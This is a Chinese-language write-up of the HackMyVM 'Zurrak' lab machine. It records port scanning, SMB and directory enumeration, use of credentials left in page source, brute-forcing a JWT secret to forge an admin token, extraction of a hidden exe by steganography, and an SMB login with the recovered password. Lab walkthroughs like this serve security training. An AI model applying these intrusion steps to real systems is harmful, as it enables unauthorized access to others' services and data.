[HackMyVM]祖拉克范围 - 端口扫描
最编程
2024-04-03 07:27:30
...
# nmap -sV -A 192.168.56.140
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-30 16:59 CST
Nmap scan report for 192.168.56.140
Host is up (0.00039s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
| http-title: Login Page
|_Requested resource was login.php
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
5432/tcp open postgresql PostgreSQL DB 9.6.0 or later
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=zurrak
| Subject Alternative Name: DNS:zurrak
| Not valid before: 2023-10-20T19:29:16
|_Not valid after: 2033-10-17T19:29:16
| fingerprint-strings:
| SMBProgNeg:
| SFATAL
| VFATAL
| C0A000
| Munsupported frontend protocol 65363.19778: server supports 3.0 to 3.0
| Fpostmaster.c
| L2195
|_ RProcessStartupPacket
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5432-TCP:V=7.94SVN%I=7%D=3/30%Time=6607D461%P=x86_64-pc-linux-gnu%r
SF:(SMBProgNeg,8C,"E\0\0\0\x8bSFATAL\0VFATAL\0C0A000\0Munsupported\x20fron
SF:tend\x20protocol\x2065363\.19778:\x20server\x20supports\x203\.0\x20to\x
SF:203\.0\0Fpostmaster\.c\0L2195\0RProcessStartupPacket\0\0");
MAC Address: 08:00:27:62:31:5D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Host script results:
| smb2-time:
| date: 2024-03-30T16:59:18
|_ start_date: N/A
|_clock-skew: 7h59m58s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
TRACEROUTE
HOP RTT ADDRESS
1 0.39 ms 192.168.56.140
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.05 seconds
开启了 80 139 445 5432 四个端口没有22
先smb枚举一下
# enum4linux 192.168.56.140
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Mar 30 17:03:12 2024
=========================================( Target Information )=========================================
Target ........... 192.168.56.140
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.56.140 )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for 192.168.56.140 )===============================
Looking up status of 192.168.56.140
No reply from 192.168.56.140
==================================( Session Check on 192.168.56.140 )==================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
无果
浅扫一下目录
# gobuster dir -u http://192.168.56.140 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.140
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php,bak,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.php (Status: 302) [Size: 1270] [--> login.php]
/.html (Status: 403) [Size: 279]
/login.php (Status: 200) [Size: 2041]
/admin.php (Status: 302) [Size: 2625] [--> login.php]
/vendor (Status: 301) [Size: 317] [--> http://192.168.56.140/vendor/]
/index_.php (Status: 200) [Size: 200]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
Progress: 346965 / 1323366 (26.22%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 347585 / 1323366 (26.27%)
===============================================================
Finished
===============================================================
可以看到有login admin index_ 几个文件 估计是要登录
去web看一下
一个朴素的登录界面,源码里给了账号密码
username:internal@zurrak.htb && password:testsite
登录上一片空白,看源码
自动跳转回index.php
想起目录扫描出来一个index_.php去看
乍一看以为base64其实是jwt
暂时不知道有什么用
回到index.php,抓包发现cookie里面有token也是一个jwt,解析一下
这次不一样了,多一个isAdmin参数
那就爆破jwt,用jwt_tools
爆破出来key是TEST123
然后伪造jwt
利用这个token去admin.php
please don't ever use these images for file transfers!!!把隐写提示甩脸上了
在第三个图片隐写了一个exe文件
# stegseek zurrakhearts.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: ""
[i] Original filename: "asli.exe".
[i] Extracting to "zurrakhearts.jpg.out".
放到ida64反编译
转化成字符串发现是ilovecats
有密码了,但是没有用户名,猜测是exe文件名asli
尝试smb连接
┌──(root㉿kali2)-[~/Desktop]
└─# smbclient //192.168.56.140/share -U asli --password ilovecats
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Oct 21 05:14:00 2023
.. D 0 Sat Oct 21 04:36:51 2023
DONTDELETE D 0 Sat Oct 21 11:44:44 2023
operations D 0 Sat Oct 21 12:04:30 2023
backup.reg N 1792 Sun Jul 24 13:30:09 2011
human_resources D 0 Sun Apr 2 13:30:09 2017
launch_options.txt N 21 Wed Dec 14 11:55:16 2022
9232860 blocks of size 1024. 6208916 blocks available
连接成功(后面我都不会,看着wp做的,也记录一下)